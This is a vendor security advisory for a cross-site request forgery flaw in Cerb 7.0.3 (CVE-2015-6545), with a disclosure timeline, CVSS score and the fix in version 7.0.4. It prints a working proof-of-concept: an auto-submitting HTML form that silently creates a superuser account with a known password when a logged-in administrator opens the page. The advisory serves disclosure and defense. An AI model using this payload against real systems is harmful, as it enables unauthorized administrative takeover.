Cross-Site Request Forgery in Cerb

This vulnerability was discovered by our security researchers before 2019.

138.8k
7
17
30
7
More
5
15

Advisory ID:	HTB23269
Product:	Cerb
Vendor:	Webgroup Media LLC
Vulnerable Versions:	7.0.3 and probably prior
Tested Version:	7.0.3
Advisory Publication:	August 12, 2015 [without technical details]
Vendor Notification:	August 12, 2015
Vendor Fix:	August 14, 2015
Public Disclosure:	September 2, 2015
Latest Update:	August 18, 2015
Vulnerability Type:	Cross-Site Request Forgery [CWE-352]
CVE Reference:	CVE-2015-6545
Risk Level:	Medium

CVSSv2 Base Score:	5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status:	Fixed by Vendor
Discovered and Provided:	High-Tech Bridge Security Research Lab
Advisory Details:
High-Tech Bridge Security Research Lab discovered CSRF vulnerability in Cerb platform, which can be exploited to perform Cross-Site Request Forgery attacks against administrators of vulnerable web application to add administrate accounts into the system. The vulnerability exists due to failure of the "/ajax.php" script to properly verify the source of incoming HTTP request. Taking into consideration that Cerb is a business-critical application, this security flaw may be quite dangerous if exploited by malicious attackers. A simple exploit below will add admin user into the system when a logged-in victim opens a malicious page with the exploit: <form action="http://[host]/ajax.php" method = "POST"> <input type="hidden" name="c" value="config"> <input type="hidden" name="a" value="handleSectionAction"> <input type="hidden" name="section" value="workers"> <input type="hidden" name="action" value="saveWorkerPeek"> <input type="hidden" name="id" value="0"> <input type="hidden" name="view_id" value="workers_cfg"> <input type="hidden" name="do_delete" value="0"> <input type="hidden" name="first_name" value="first name"> <input type="hidden" name="last_name" value="last name"> <input type="hidden" name="title" value="title"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="at_mention_name" value="name"> <input type="hidden" name="is_disabled" value="0"> <input type="hidden" name="is_superuser" value="1"> <input type="hidden" name="lang_code" value="en_US"> <input type="hidden" name="timezone" value="Antarctica%2FTroll"> <input type="hidden" name="time_format" value="D%2C+d+M+Y+h%3Ai+a"> <input type="hidden" name="auth_extension_id" value="login.password"> <input type="hidden" name="password_new" value="password"> <input type="hidden" name="password_verify" value="password"> <input type="hidden" name="calendar_id" value="new"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script>
ImmuniWeb® AI Platform Test your application security with our award-winning AI technology and a contractual zero false-positives SLA: Get a Demo ImmuniWeb® Neuron Premium Web Application Security Scanning ImmuniWeb® On-Demand Compliance-Ready Web Penetration Testing ImmuniWeb® Continuous Continuous Web Scanning and Penetration Testing Get a Demo Solution:
Update to Cerb 7.0.4 More Information: https://github.com/wgm/cerb/commit/12de87ff9961a4f3ad2946c8f47dd0c260607144 http://wiki.cerbweb.com/7.0#7.0.4

ImmuniWeb® AI Platform Test your application security with our award-winning AI technology and a contractual zero false-positives SLA: Get a Demo Get your free cyber risk exposure assessment ImmuniWeb® Discovery Continuous Threat Exposure Management ImmuniWeb® Neuron Premium Web Application Security Scanning ImmuniWeb® On-Demand Compliance-Ready Web Penetration Testing Get a Demo Get your free cyber risk exposure assessment
References:
[1] High-Tech Bridge Advisory HTB23269 - https://www.immuniweb.com/advisory/HTB23269 - Cross-Site Request Forgery in Cerb. [2] Cerb - http://www.cerberusweb.com/ - Cerb is a fast and flexible platform for enterprise collaboration, productivity, and automation. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® - Leveraging the power of machine-learning and genius of human brain to deliver the most advanced web application security and penetration testing. [6] ImmuniWeb® SSLScan - Test your servers for security and compliance with PCI DSS, HIPAA and NIST.

Previous Security Advisories with CWE-352:

HTB23266: Cross-Site Request Forgery on Oxwall

HTB23260: Multiple Vulnerabilities in ISPConfig

138.8k
7
17
30
7
More
5
15

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.